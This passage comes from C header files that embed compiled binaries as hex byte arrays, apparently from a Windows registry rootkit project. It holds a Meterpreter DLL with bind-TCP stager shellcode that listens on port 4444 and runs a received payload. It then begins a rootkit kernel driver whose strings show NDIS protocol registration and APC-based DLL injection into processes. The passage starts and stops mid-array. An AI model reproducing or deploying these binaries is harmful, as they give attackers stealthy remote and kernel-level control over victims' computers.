0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65, 0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61, 0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65, 0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72, 0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72, 0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04, 0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00, 0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c, 0x65,0x48,0x61,0x6e,0x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74, 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65, 0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00, 0x3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00, 0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72, 0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65, 0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00, 0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73, 0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41, 0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65, 0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32, 0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0x49,0x33,0x32,0x2e,0x64, 0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00, 0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00, 0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00, 0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65, 0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00, 0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac, 0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f, 0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c, 0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52, 0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72, 0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b, 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0, 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57, 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01, 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b, 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4, 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24, 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d, 0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07, 0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00, 0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff, 0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57, 0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5, 0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d, 0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5, 0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53, 0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff, 0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30, 0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30, 0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31, 0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31, 0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31, 0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33, 0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33, 0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33, 0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34, 0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34, 0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35, 0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35, 0x60,0x35,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; ================================================ FILE: src/includes/rootkit_driver_debug.sys.h ================================================ // 23680 bytes readed form ..\rootkit_driver_debug.sys... 
unsigned char rootkit_driver[] = { 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x00,0x00,0x00, 0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68, 0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f, 0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20, 0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x45,0x95,0x8a,0x93,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0, 0x01,0xf4,0xe5,0xc0,0x2b,0xf4,0xe4,0xc0,0x26,0x32,0x9f,0xc0,0x04,0xf4,0xe4,0xc0, 0x26,0x32,0x89,0xc0,0x03,0xf4,0xe4,0xc0,0x08,0x8c,0x60,0xc0,0x07,0xf4,0xe4,0xc0, 0x08,0x8c,0x76,0xc0,0x00,0xf4,0xe4,0xc0,0x08,0x8c,0x75,0xc0,0x00,0xf4,0xe4,0xc0, 0x52,0x69,0x63,0x68,0x01,0xf4,0xe4,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x56,0x00,0x00, 0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x26,0x00,0x00,0x80,0x02,0x00,0x00, 0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x10,0x80,0x00,0x00,0x00,0x80,0x00,0x00,0x00, 0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x80,0x5c,0x00,0x00,0x80,0x02,0x00,0x00,0x46,0xc6,0x00,0x00,0x01,0x00,0x00,0x00, 0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x41,0x00,0x00,0x00, 0xf4,0x54,0x00,0x00,0x3c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x80,0x59,0x00,0x00,0xd0,0x02,0x00,0x00,0x80,0x03,0x00,0x00,0x1c,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x68,0x0e,0x00,0x00,0x40,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x02,0x00,0x00,0xb0,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 0x8c,0x2a,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x02,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x68, 0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xa0,0x00,0x00,0x00,0x80,0x2d,0x00,0x00, 0x00,0x01,0x00,0x00,0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc8,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00, 0xfa,0x2a,0x00,0x00,0x80,0x2e,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x2e,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0xe2, 0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xd8,0x02,0x00,0x00,0x80,0x59,0x00,0x00, 0x00,0x03,0x00,0x00,0x80,0x59,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00, 0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00, 0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00, 0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00, 0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00, 0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00, 0xd4,0x57,0x00,0x00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00, 0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00, 
0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00, 0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00, 0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x58,0x03,0x00,0x00, 0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5f, 0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x73,0x79,0x73, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00, 0x64,0x00,0x00,0x00,0xb0,0x0e,0x00,0x00,0xb0,0x0e,0x00,0x00,0x42,0x00,0x6f,0x00, 0x67,0x00,0x75,0x00,0x73,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x74,0x00,0x6f,0x00, 0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x65,0x72, 0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73, 0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78, 0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x4b,0x65,0x72,0x6e,0x65,0x6c, 0x41,0x70,0x63,0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x0a,0x00,0x00,0x00, 0x49,0x6e,0x6a,0x65,0x63,0x74,0x46,0x69,0x6e,0x64,0x50,0x72,0x6f,0x63,0x65,0x73, 0x73,0x28,0x29,0x3a,0x20,0x22,0x25,0x77,0x5a,0x22,0x2c,0x20,0x50,0x49,0x44,0x20, 0x3d,0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70, 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65,0x73,0x73, 0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20,0x73,0x74,0x61,0x74, 0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x50,0x73,0x4c,0x6f, 0x6f,0x6b,0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f, 0x63,0x65,0x73,0x73,0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20, 
0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00, 0x49,0x6d,0x6a,0x65,0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67, 0x65,0x28,0x29,0x3a,0x20,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x20,0x66,0x6f,0x72,0x20, 0x69,0x6d,0x61,0x67,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20, 0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6d,0x6a,0x65, 0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67,0x65,0x28,0x29,0x20, 0x45,0x58,0x43,0x45,0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x5a,0x77,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d, 0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61, 0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00, 0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69, 0x6f,0x6e,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x66,0x61,0x69,0x6c, 0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38, 0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72, 0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20,0x65, 0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x69,0x73,0x20,0x61,0x74, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x43,0x61,0x6c,0x6c, 0x67,0x61,0x74,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x61, 0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65, 0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a, 0x20,0x45,0x72,0x72,0x6f,0x72,0x20,0x77,0x68,0x69,0x6c,0x65,0x20,0x64,0x65,0x6c, 0x69,0x76,0x65,0x72,0x69,0x6e,0x67,0x20,0x41,0x50,0x43,0x0a,0x00,0x00,0x00,0x00, 0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73, 0x73,0x28,0x29,0x3a,0x20,0x41,0x50,0x43,0x20,0x64,0x65,0x6c,0x69,0x76,0x65,0x72, 
0x65,0x64,0x21,0x0a,0x00,0x00,0x00,0x00,0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74, 0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x0a,0x00,0x00,0x00,0x5a,0x77,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69, 0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61, 0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25, 0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x45,0x58,0x43,0x45, 0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x4f,0x62,0x4f,0x70,0x65,0x6e,0x4f,0x62, 0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x28,0x29,0x20, 0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30, 